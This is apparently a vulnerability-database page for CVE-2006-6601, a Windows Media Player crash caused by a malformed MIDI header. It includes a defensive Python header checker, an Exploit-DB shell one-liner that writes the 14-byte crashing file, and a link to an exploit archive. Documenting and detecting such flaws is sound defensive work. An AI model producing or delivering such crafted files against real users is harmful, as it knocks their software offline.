CVE-2006-6601
Published 2006-12-15
CVE-2006-6601: Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a…
Priority: P4 · 19 · medium · CVSS 2.0: 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 17.14% (96.7th percentile)
Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks or (2) time division fields that are set to 0.
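As a defensive counterpart to the description above, this added example (not part of the advisory or the Exploit-DB entries) checks a Standard MIDI File header for the conditions the CVE names before the file reaches a player. The function name `check_smf` and both sample byte strings are constructed for illustration; `POC_HEADER` reproduces the 14-byte header quoted in the Exploit-DB entry on this page, and RIFF-wrapped MIDI is assumed out of scope.

```python
import struct

def check_smf(data: bytes) -> list[str]:
    """Return findings for a Standard MIDI File; an empty list means the header looks sane."""
    if len(data) < 14 or data[:4] != b"MThd":
        return ["not a Standard MIDI File (missing or short MThd header chunk)"]
    # Header chunk: 4-byte length, then format, number of tracks, time division (big-endian).
    hdr_len, fmt, ntrks, division = struct.unpack(">IHHH", data[4:14])
    if hdr_len < 6:
        return [f"header chunk length {hdr_len} is smaller than 6"]
    findings = []
    if fmt > 2:
        findings.append(f"unknown format {fmt}")
    if ntrks == 0:
        findings.append("number of tracks is 0")
    if division == 0:
        findings.append("time division is 0")
    # Walk the chunks that follow the header and count the MTrk chunks actually present.
    pos, tracks = 8 + hdr_len, 0
    while pos + 8 <= len(data):
        ctype = data[pos:pos + 4]
        clen = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        if pos + 8 + clen > len(data):
            findings.append(f"chunk at offset {pos} runs past end of file")
            break
        if ctype == b"MTrk":
            tracks += 1
        pos += 8 + clen
    if tracks == 0:
        findings.append("no track chunks present")
    elif tracks != ntrks:
        findings.append(f"header declares {ntrks} tracks, file contains {tracks}")
    return findings

# Constructed samples: the 14-byte header from this page, and a minimal valid file
# (format 0, one track, 96 ticks per quarter note, track holding only End of Track).
POC_HEADER = bytes.fromhex("4D546864 00000006 0000 0000 0000")
VALID_FILE = (b"MThd" + struct.pack(">IHHH", 6, 0, 1, 96)
              + b"MTrk" + struct.pack(">I", 4) + b"\x00\xff\x2f\x00")

if __name__ == "__main__":
    for name, blob in (("poc header", POC_HEADER), ("valid file", VALID_FILE)):
        print(name, "->", check_smf(blob) or "ok")
```

A mail or web gateway can run a check like this on `.mid` attachments and quarantine any file that returns findings.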
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| windows | media_player | — | — |
No detection rules found.
Exploit-DB
Microsoft Windows Media Player 9/10 - '.mid' Denial of Service
exploitdb·2006-12-15
---
```sh
#!/bin/sh
# Windows Media MID File Denial Of Service Vulnerability
# Tested:
# Windows Media 10.00.00.4036
# Windows XP SP2
# file "example.mid" (Hex-Code):
# 4D 54 68 64 00 00 00 06 00 00 00 00 00 00
# File size = 14 byte
perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid
# milw0rm.com [2006-12-15]
```
Exploit-DB
Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service
exploitdb·2006-12-15
---
source: https://www.securityfocus.com/bid/21612/info
Multiple applications are prone to a denial-of-service vulnerability.
A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service.
It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29285.zip
http://www.attrition.org/pipermail/vim/2006-December/001182.html
http://www.securityfocus.com/archive/1/454505/100/0/threaded
http://www.securityfocus.com/bid/21612
http://www.vupen.com/english/advisories/2006/5039
Published: 2006-12-15